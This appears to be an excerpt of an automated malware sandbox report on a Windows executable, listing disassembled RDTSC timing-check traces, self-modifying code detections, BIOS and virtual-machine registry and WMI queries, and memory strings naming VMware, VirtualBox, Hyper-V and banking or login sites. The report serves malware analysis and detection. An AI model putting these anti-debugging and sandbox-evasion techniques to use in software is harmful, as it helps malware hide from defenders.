                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E505C3 second address: 4E505C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E505C7 second address: 4E505CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E505CD second address: 4E505E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E5277420h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E505E1 second address: 4E506F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B2921Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FB9E4B29226h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov di, 1964h 0x00000017 call 00007FB9E4B2921Dh 0x0000001c pushfd 0x0000001d jmp 00007FB9E4B29220h 0x00000022 sub ah, 00000018h 0x00000025 jmp 00007FB9E4B2921Bh 0x0000002a popfd 0x0000002b pop eax 0x0000002c popad 0x0000002d xchg eax, esi 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FB9E4B29225h 0x00000035 xor cx, E5B6h 0x0000003a jmp 00007FB9E4B29221h 0x0000003f popfd 0x00000040 pushfd 0x00000041 jmp 00007FB9E4B29220h 0x00000046 add ecx, 107F58D8h 0x0000004c jmp 00007FB9E4B2921Bh 0x00000051 popfd 0x00000052 popad 0x00000053 lea eax, dword ptr [ebp-04h] 0x00000056 jmp 00007FB9E4B29226h 0x0000005b nop 0x0000005c jmp 00007FB9E4B29220h 0x00000061 push eax 0x00000062 jmp 00007FB9E4B2921Bh 0x00000067 nop 0x00000068 pushad 0x00000069 pushfd 0x0000006a jmp 00007FB9E4B29224h 0x0000006f and ch, FFFFFFC8h 0x00000072 jmp 00007FB9E4B2921Bh 0x00000077 popfd 0x00000078 push eax 0x00000079 push edx 0x0000007a mov dx, cx 0x0000007d rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E50804 second address: 4E5083F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB9E527741Fh 0x00000008 mov di, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f pushad 0x00000010 movzx ecx, di 0x00000013 jmp 00007FB9E527741Dh 0x00000018 popad 0x00000019 leave 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB9E527741Dh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E5083F second address: 4E50845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E50845 second address: 4E402A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E5277423h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0004h 0x0000000e nop 0x0000000f sub esp, 04h 0x00000012 xor ebx, ebx 0x00000014 cmp eax, 00000000h 0x00000017 je 00007FB9E527757Ah 0x0000001d mov dword ptr [esp], 0000000Dh 0x00000024 call 00007FB9E9CA3789h 0x00000029 mov edi, edi 0x0000002b jmp 00007FB9E5277425h 0x00000030 xchg eax, ebp 0x00000031 jmp 00007FB9E527741Eh 0x00000036 push eax 0x00000037 pushad 0x00000038 movsx edx, cx 0x0000003b pushfd 0x0000003c jmp 00007FB9E527741Ah 0x00000041 jmp 00007FB9E5277425h 0x00000046 popfd 0x00000047 popad 0x00000048 xchg eax, ebp 0x00000049 pushad 0x0000004a call 00007FB9E527741Ch 0x0000004f pushfd 0x00000050 jmp 00007FB9E5277422h 0x00000055 add esi, 60399A68h 0x0000005b jmp 00007FB9E527741Bh 0x00000060 popfd 0x00000061 pop eax 0x00000062 pushfd 0x00000063 jmp 00007FB9E5277429h 0x00000068 and ax, 0486h 0x0000006d jmp 00007FB9E5277421h 0x00000072 popfd 0x00000073 popad 0x00000074 mov ebp, esp 0x00000076 push eax 0x00000077 push edx 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007FB9E5277428h 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E402A9 second address: 4E402B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B2921Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E402B8 second address: 4E402E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E5277429h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB9E527741Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E402E7 second address: 4E4030C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bh 0x00000005 movzx eax, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB9E4B29227h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E4042C second address: 4E40432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E40432 second address: 4E40436 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E40436 second address: 4E4046C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FB9E5277610h 0x0000000e jmp 00007FB9E5277427h 0x00000013 lea ecx, dword ptr [ebp-14h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov edi, 7AA75D16h 0x0000001e mov edx, 253434A2h 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E4046C second address: 4E4047F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E4B2921Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E4047F second address: 4E40483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E40519 second address: 4E4053A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FB9E4B2921Eh 0x0000000c nop 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov eax, edi 0x00000012 mov edi, 7AACE9FCh 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E40571 second address: 4E40577 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E40577 second address: 4E4057C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E4057C second address: 4E405FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FB9E527741Eh 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test eax, eax 0x0000000f pushad 0x00000010 mov edx, eax 0x00000012 popad 0x00000013 jg 00007FBA574C530Ah 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FB9E5277422h 0x00000020 jmp 00007FB9E5277425h 0x00000025 popfd 0x00000026 push esi 0x00000027 jmp 00007FB9E5277427h 0x0000002c pop eax 0x0000002d popad 0x0000002e js 00007FB9E527746Ch 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FB9E5277421h 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E405FD second address: 4E40601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E40601 second address: 4E40607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E4078C second address: 4E407A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B29229h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E407A9 second address: 4E40809 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 7E8CAD32h 0x00000008 jmp 00007FB9E5277423h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov esi, eax 0x00000012 pushad 0x00000013 jmp 00007FB9E527741Bh 0x00000018 popad 0x00000019 test esi, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FB9E527741Bh 0x00000024 xor esi, 1E851C8Eh 0x0000002a jmp 00007FB9E5277429h 0x0000002f popfd 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E40809 second address: 4E4080E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E4080E second address: 4E4081C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E527741Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E4081C second address: 4E40820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E40820 second address: 4E40073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FBA574C5243h 0x0000000e xor eax, eax 0x00000010 jmp 00007FB9E5250B4Ah 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d sub esp, 04h 0x00000020 mov esi, eax 0x00000022 xor ebx, ebx 0x00000024 cmp esi, 00000000h 0x00000027 je 00007FB9E5277555h 0x0000002d call 00007FB9E9CA345Ch 0x00000032 mov edi, edi 0x00000034 jmp 00007FB9E5277427h 0x00000039 xchg eax, ebp 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007FB9E5277424h 0x00000041 sbb si, 4C58h 0x00000046 jmp 00007FB9E527741Bh 0x0000004b popfd 0x0000004c pushfd 0x0000004d jmp 00007FB9E5277428h 0x00000052 sbb ax, D6B8h 0x00000057 jmp 00007FB9E527741Bh 0x0000005c popfd 0x0000005d popad 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E40073 second address: 4E40077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E40077 second address: 4E4007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E4007D second address: 4E400B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B2921Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB9E4B2921Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB9E4B29227h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E400B8 second address: 4E400D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB9E5277423h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E4015A second address: 4E4015E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E4015E second address: 4E401B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FB9E5277426h 0x0000000c adc ax, DF58h 0x00000011 jmp 00007FB9E527741Bh 0x00000016 popfd 0x00000017 popad 0x00000018 leave 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c call 00007FB9E527741Bh 0x00000021 pop esi 0x00000022 jmp 00007FB9E5277429h 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E40CD9 second address: 4E40D37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B2921Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FB9E4B29229h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov di, cx 0x0000001a pushfd 0x0000001b jmp 00007FB9E4B29226h 0x00000020 sub eax, 5F7E9E38h 0x00000026 jmp 00007FB9E4B2921Bh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E40D37 second address: 4E40DE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E5277429h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FB9E5277427h 0x00000014 sub cl, 0000005Eh 0x00000017 jmp 00007FB9E5277429h 0x0000001c popfd 0x0000001d call 00007FB9E5277420h 0x00000022 call 00007FB9E5277422h 0x00000027 pop esi 0x00000028 pop edx 0x00000029 popad 0x0000002a pop eax 0x0000002b jmp 00007FB9E527741Eh 0x00000030 call 00007FBA574BC1C6h 0x00000035 push 77082B70h 0x0000003a push dword ptr fs:[00000000h] 0x00000041 mov eax, dword ptr [esp+10h] 0x00000045 mov dword ptr [esp+10h], ebp 0x00000049 lea ebp, dword ptr [esp+10h] 0x0000004d sub esp, eax 0x0000004f push ebx 0x00000050 push esi 0x00000051 push edi 0x00000052 mov eax, dword ptr [770E4538h] 0x00000057 xor dword ptr [ebp-04h], eax 0x0000005a xor eax, ebp 0x0000005c push eax 0x0000005d mov dword ptr [ebp-18h], esp 0x00000060 push dword ptr [ebp-08h] 0x00000063 mov eax, dword ptr [ebp-04h] 0x00000066 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000006d mov dword ptr [ebp-08h], eax 0x00000070 lea eax, dword ptr [ebp-10h] 0x00000073 mov dword ptr fs:[00000000h], eax 0x00000079 ret 0x0000007a jmp 00007FB9E5277420h 0x0000007f sub esi, esi 0x00000081 push eax 0x00000082 push edx 0x00000083 pushad 0x00000084 pushad 0x00000085 popad 0x00000086 mov si, 36DFh 0x0000008a popad 0x0000008b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E40DE3 second address: 4E40E09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B29225h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-1Ch], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bx, 16DEh 0x00000013 push ebx 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E40E5B second address: 4E40E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E40E60 second address: 4E40EC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B29227h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b jmp 00007FB9E4B29226h 0x00000010 je 00007FBA56D5CD08h 0x00000016 pushad 0x00000017 push ecx 0x00000018 mov di, 0AE0h 0x0000001c pop ebx 0x0000001d mov ax, 2E55h 0x00000021 popad 0x00000022 cmp dword ptr [ebp+08h], 00002000h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FB9E4B29227h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E50882 second address: 4E50886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E50886 second address: 4E5090C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, F5F5h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FB9E4B2921Bh 0x00000011 xchg eax, ebp 0x00000012 jmp 00007FB9E4B29226h 0x00000017 mov ebp, esp 0x00000019 jmp 00007FB9E4B29220h 0x0000001e xchg eax, esi 0x0000001f jmp 00007FB9E4B29220h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007FB9E4B2921Ch 0x0000002d pushfd 0x0000002e jmp 00007FB9E4B29222h 0x00000033 adc ax, 4938h 0x00000038 jmp 00007FB9E4B2921Bh 0x0000003d popfd 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E5090C second address: 4E50931 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov dx, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB9E5277424h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E50931 second address: 4E50935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E50935 second address: 4E5093B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E5093B second address: 4E509E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 73F788E3h 0x00000008 call 00007FB9E4B29228h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov esi, dword ptr [ebp+0Ch] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FB9E4B29227h 0x0000001b jmp 00007FB9E4B29223h 0x00000020 popfd 0x00000021 mov ch, 53h 0x00000023 popad 0x00000024 test esi, esi 0x00000026 pushad 0x00000027 call 00007FB9E4B29221h 0x0000002c jmp 00007FB9E4B29220h 0x00000031 pop eax 0x00000032 movsx edi, cx 0x00000035 popad 0x00000036 je 00007FBA56D56C12h 0x0000003c pushad 0x0000003d mov bx, cx 0x00000040 mov cx, 76EBh 0x00000044 popad 0x00000045 cmp dword ptr [770E459Ch], 05h 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FB9E4B2921Dh 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E509E0 second address: 4E50A2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB9E5277427h 0x00000009 adc ax, 9F3Eh 0x0000000e jmp 00007FB9E5277429h 0x00000013 popfd 0x00000014 mov ecx, 7572E287h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c je 00007FBA574BCE8Bh 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E50A2E second address: 4E50A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E50A32 second address: 4E50A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E50A38 second address: 4E50A6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB9E4B2921Ch 0x00000008 call 00007FB9E4B29222h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB9E4B2921Dh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E50A6D second address: 4E50AA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E5277421h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB9E5277428h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E50AA1 second address: 4E50AB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B2921Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E50B06 second address: 4E50B0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E50B0A second address: 4E50B10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E50B10 second address: 4E50B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E527741Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB9E527741Bh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E50B30 second address: 4E50B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSpecial instruction interceptor: First address: 4388A3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSpecial instruction interceptor: First address: 438978 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSpecial instruction interceptor: First address: 6564AD instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe TID: 7212Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe TID: 7212Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: hx0wBsOjkQ.exe, hx0wBsOjkQ.exe, 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541269769.0000000005812000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1626918311.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1599396098.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1672925313.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000002.1673817152.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1517343643.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495218913.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1624185522.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1599230927.0000000000E0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
